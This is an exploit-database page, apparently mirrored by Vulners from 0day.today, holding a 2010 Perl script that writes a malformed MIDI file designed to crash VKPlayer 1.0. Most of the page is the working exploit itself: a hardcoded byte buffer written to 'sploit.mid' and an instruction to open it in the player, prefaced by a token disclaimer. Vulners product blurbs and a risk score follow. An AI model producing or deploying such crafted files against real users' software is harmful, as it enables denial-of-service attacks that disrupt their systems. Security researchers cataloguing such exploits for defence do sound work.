Lucene search
K

VKPlayer 1.0 (.mid) Denial of Service Exploit

🗓️ 22 Feb 2010 00:00:00Reported by cr4wl3rType 
zdt
 zdt
🔗 0day.today👁 19 Views

VKPlayer 1.0 (.mid) Denial of Service Exploit. Perl script creates a malicious .mid file to cause denial of service in VKPlayer 1.

Code
=============================================
VKPlayer 1.0 (.mid) Denial of Service Exploit
=============================================

#!/usr/bin/perl
 
 
# VKPlayer 1.0 (.mid) Denial of Service Exploit
# Download: http://www.brothersoft.com/vkplayer-239785.html
# Exploit Coded by: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
# From: Indonesia
#
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# WARNING - WARNING - WARNING - WARNING
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#
#
# Disclaimer: The author published the information under the condition
#             that is not in the intention of the reader to use them in order to bring
#             to himself or others a profit or to bring to others damage.
#
#
# Gr33tz: No Thanks
 
 
 
print "
[+]-----------------------------------------------[+]
[+] VKPlayer 1.0 (.mid) Denial of Service Exploit [+]
[+] By : cr4wl3r                                  [+]
[+]-----------------------------------------------[+]
";
 
$buff =
"\x52\x49\x46\x46\xff\xff\x00\x00\x52\x4d\x49\x44\x64\x64\x64\x64".
"\xf8\xff\xff\xff\x4d\x54\x68\x64\xff\xff\xff\xff\xf8\xff\xff\xf8".
"\xf8\xff\xff\xff\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";
#######################################################################################
open(file, "> sploit.mid");
print (file $buff);
#######################################################################################
print "\n[+] Done!\n
[+] Open with VKPlayer and play\n
[+] Coded by cr4wl3r\n";



#  0day.today [2018-03-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Feb 2010 00:00Current
7High risk
Vulners AI Score7
19